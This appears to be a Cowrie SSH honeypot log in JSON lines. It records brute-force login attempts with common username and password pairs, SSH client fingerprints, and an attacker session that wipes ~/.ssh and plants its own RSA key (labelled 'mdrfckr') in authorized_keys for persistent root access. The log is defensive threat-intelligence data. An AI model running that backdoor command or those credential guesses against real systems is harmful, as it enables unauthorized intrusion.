{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:51:01.060753Z","src_ip":"134.199.174.250","session":"8193b9f966bd"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"123","message":"login attempt [www-data/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:51:01.978853Z","src_ip":"134.199.174.250","session":"8193b9f966bd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:51:03.286352Z","src_ip":"134.199.174.250","session":"8193b9f966bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33232,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a5fe95ae4ad","protocol":"ssh","message":"New connection: 212.227.235.229:33232 (1.2.3.4:22) [session: 4a5fe95ae4ad]","sensor":"my-vps","timestamp":"2025-09-08T13:51:18.896617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:51:18.897285Z","src_ip":"212.227.235.229","session":"4a5fe95ae4ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:51:19.026386Z","src_ip":"212.227.235.229","session":"4a5fe95ae4ad"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"password123","message":"login attempt [sshd/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:51:19.581433Z","src_ip":"212.227.235.229","session":"4a5fe95ae4ad"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:51:20.712133Z","src_ip":"212.227.235.229","session":"4a5fe95ae4ad"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":40148,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e7a2ba25058","protocol":"ssh","message":"New connection: 134.199.174.250:40148 (1.2.3.4:22) [session: 8e7a2ba25058]","sensor":"my-vps","timestamp":"2025-09-08T13:51:30.524532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:51:30.688271Z","src_ip":"134.199.174.250","session":"8e7a2ba25058"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:51:30.859632Z","src_ip":"134.199.174.250","session":"8e7a2ba25058"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"qwerty123","message":"login attempt [www-data/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:51:32.206014Z","src_ip":"134.199.174.250","session":"8e7a2ba25058"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:51:33.548713Z","src_ip":"134.199.174.250","session":"8e7a2ba25058"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":58509,"dst_ip":"1.2.3.4","dst_port":22,"session":"82345c3ab214","protocol":"ssh","message":"New connection: 49.247.35.31:58509 (1.2.3.4:22) [session: 82345c3ab214]","sensor":"my-vps","timestamp":"2025-09-08T13:51:50.814600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:51:50.817553Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:51:51.114756Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.login.success","username":"root","password":"Cpu","message":"login attempt [root/Cpu] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:51:52.279676Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:51:52.910075Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:51:52.910908Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:51:52.911675Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:51:53.198906Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:51:53.834291Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:51:53.835202Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:51:54.121332Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:51:54.122261Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":8889,"dst_ip":"1.2.3.4","dst_port":22,"session":"435e32aea4e3","protocol":"ssh","message":"New connection: 49.247.35.31:8889 (1.2.3.4:22) [session: 435e32aea4e3]","sensor":"my-vps","timestamp":"2025-09-08T13:51:54.414605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:51:54.415598Z","src_ip":"49.247.35.31","session":"435e32aea4e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55460,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ec9621dcf2d","protocol":"ssh","message":"New connection: 212.227.235.229:55460 (1.2.3.4:22) [session: 4ec9621dcf2d]","sensor":"my-vps","timestamp":"2025-09-08T13:51:54.638070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:51:54.643376Z","src_ip":"212.227.235.229","session":"4ec9621dcf2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:51:54.721774Z","src_ip":"49.247.35.31","session":"435e32aea4e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:51:54.870256Z","src_ip":"212.227.235.229","session":"4ec9621dcf2d"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"db1inst1123","message":"login attempt [db1inst1/db1inst1123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:51:55.778274Z","src_ip":"212.227.235.229","session":"4ec9621dcf2d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:51:55.919341Z","src_ip":"49.247.35.31","session":"435e32aea4e3"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:51:57.215241Z","src_ip":"49.247.35.31","session":"435e32aea4e3"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":6763,"dst_ip":"1.2.3.4","dst_port":22,"session":"d10d8dffe467","protocol":"ssh","message":"New connection: 49.247.35.31:6763 (1.2.3.4:22) [session: d10d8dffe467]","sensor":"my-vps","timestamp":"2025-09-08T13:51:57.474064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:51:57.476239Z","src_ip":"49.247.35.31","session":"d10d8dffe467"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:51:57.527626Z","src_ip":"212.227.235.229","session":"4ec9621dcf2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:51:57.734924Z","src_ip":"49.247.35.31","session":"d10d8dffe467"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:51:58.800192Z","src_ip":"49.247.35.31","session":"d10d8dffe467"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:51:59.075508Z","src_ip":"49.247.35.31","session":"82345c3ab214"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:51:59.076425Z","src_ip":"49.247.35.31","session":"d10d8dffe467"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":60754,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0e795135df4","protocol":"ssh","message":"New connection: 134.199.174.250:60754 (1.2.3.4:22) [session: a0e795135df4]","sensor":"my-vps","timestamp":"2025-09-08T13:52:00.440807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:52:00.441684Z","src_ip":"134.199.174.250","session":"a0e795135df4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:52:00.738650Z","src_ip":"134.199.174.250","session":"a0e795135df4"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"1q2w3e4r","message":"login attempt [www-data/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:52:02.461310Z","src_ip":"134.199.174.250","session":"a0e795135df4"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:52:03.759375Z","src_ip":"134.199.174.250","session":"a0e795135df4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47936,"dst_ip":"1.2.3.4","dst_port":22,"session":"141031fb4ba6","protocol":"ssh","message":"New connection: 212.227.235.229:47936 (1.2.3.4:22) [session: 141031fb4ba6]","sensor":"my-vps","timestamp":"2025-09-08T13:52:06.773574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:52:06.775013Z","src_ip":"212.227.235.229","session":"141031fb4ba6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:52:06.879873Z","src_ip":"212.227.235.229","session":"141031fb4ba6"}
{"eventid":"cowrie.login.failed","username":"webserver","password":"webserver","message":"login attempt [webserver/webserver] failed","sensor":"my-vps","timestamp":"2025-09-08T13:52:07.354348Z","src_ip":"212.227.235.229","session":"141031fb4ba6"}
